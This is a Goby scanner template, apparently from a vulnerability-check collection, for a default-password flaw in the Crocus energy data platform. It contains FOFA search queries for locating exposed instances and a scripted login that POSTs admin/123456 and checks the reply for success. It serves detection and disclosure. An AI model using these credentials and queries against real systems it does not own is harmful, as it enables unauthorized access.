mirror of https://github.com/qwqdanchun/Goby.git
149 lines
4.4 KiB
JSON
149 lines
4.4 KiB
JSON
{
|
||
"Name": "Crocus default password vulnerability",
|
||
"Description": "<p>Crocus is an energy data analysis platform</p><p> crocus has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p>",
|
||
"Product": "Crocus",
|
||
"Homepage": "https://crocus.ai/",
|
||
"DisclosureDate": "2021-12-02",
|
||
"Author": "9429658@qq.com",
|
||
"FofaQuery": "title=\"Crocus\" && body=\"ThirdResource\"",
|
||
"GobyQuery": "title=\"Crocus\" && body=\"ThirdResource\"",
|
||
"Level": "2",
|
||
"Impact": "<p>crocus has a weak password vulnerability, which can be used by attackers to obtain sensitive information.</p>",
|
||
"Recommendation": "<p>Modify the system administrator password to prevent malicious login.</p>",
|
||
"Translation": {
|
||
"CN": {
|
||
"Name": "Crocus 数据分析平台默认口令漏洞",
|
||
"Product": "Crocus",
|
||
"Tags": [
|
||
"默认口令"
|
||
],
|
||
"Description": "<p>Crocus是一款能源数据分析平台。</p><p>Crocus存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。</p>",
|
||
"Impact": "<p>Crocus存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息<br></p>",
|
||
"Recommendation": "<p>修改系统管理员口令,防止恶意登录。</p>",
|
||
"VulType": [
|
||
"默认口令"
|
||
]
|
||
}
|
||
},
|
||
"References": [
|
||
"https://fofa.so/"
|
||
],
|
||
"Is0day": false,
|
||
"HasExp": false,
|
||
"ExpParams": [],
|
||
"ExpTips": {
|
||
"Type": "",
|
||
"Content": ""
|
||
},
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/Plugin/RegisterLogin/Default.jsp",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Accept": "application/json, text/javascript, */*; q=0.01",
|
||
"X-Requested-With": "XMLHttpRequest",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36",
|
||
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"ck|lastheader|regex|JSESSIONID=(.*?);"
|
||
]
|
||
},
|
||
{
|
||
"Request": {
|
||
"method": "POST",
|
||
"uri": "/RegisterLogin.do?Action=Login",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"Accept": "application/json, text/javascript, */*; q=0.01",
|
||
"X-Requested-With": "XMLHttpRequest",
|
||
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36",
|
||
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
|
||
"Accept-Encoding": "gzip, deflate",
|
||
"Accept-Language": "zh-CN,zh;q=0.9",
|
||
"Cookie": "JSESSIONID={{{ck}}};",
|
||
"Connection": "close"
|
||
},
|
||
"data_type": "text",
|
||
"data": "UserName=admin&Password=123456&MailCode=&AuthCode="
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "\"Result\":true",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "\"Code\":200",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": [
|
||
"keymemo|define|variable|admin:123456",
|
||
"vulurl|define|variable|{{{scheme}}}://admin:123456@{{{hostinfo}}}/RegisterLogin.do?Action=Login"
|
||
]
|
||
}
|
||
],
|
||
"ExploitSteps": null,
|
||
"Tags": [
|
||
"default password"
|
||
],
|
||
"VulType": [
|
||
"default password"
|
||
],
|
||
"CVEIDs": [
|
||
""
|
||
],
|
||
"CNNVD": [
|
||
""
|
||
],
|
||
"CNVD": [
|
||
"CNVD-2021-42780"
|
||
],
|
||
"CVSSScore": "5.5",
|
||
"AttackSurfaces": {
|
||
"Application": null,
|
||
"Support": null,
|
||
"Service": null,
|
||
"System": null,
|
||
"Hardware": null
|
||
}
|
||
} |